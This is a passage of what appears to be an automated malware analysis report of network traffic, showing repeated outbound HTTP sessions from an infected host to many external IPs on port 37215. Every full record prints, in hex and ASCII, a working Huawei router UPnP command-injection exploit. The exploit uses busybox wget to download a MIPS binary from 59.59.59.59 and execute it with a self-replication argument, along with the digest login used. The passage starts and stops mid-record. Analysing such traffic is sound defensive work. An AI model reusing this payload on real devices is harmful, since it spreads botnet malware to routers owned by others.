20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1409192.168.2.156072041.177.61.23437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.843590975 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1410192.168.2.154339635.31.51.437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.843616009 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1411192.168.2.155232043.71.115.1837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.843911886 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1412192.168.2.153544841.167.52.237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.843939066 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1413192.168.2.1539876197.105.169.24337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.843957901 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1414192.168.2.1554296157.205.231.19537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.848869085 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1415192.168.2.1541952197.108.194.337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.849803925 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1416192.168.2.1552678197.3.200.24337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.849818945 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1417192.168.2.1552240157.121.36.15637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.850166082 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1418192.168.2.155149464.182.54.20137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.850213051 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1419192.168.2.1556710197.111.216.9437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.850230932 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
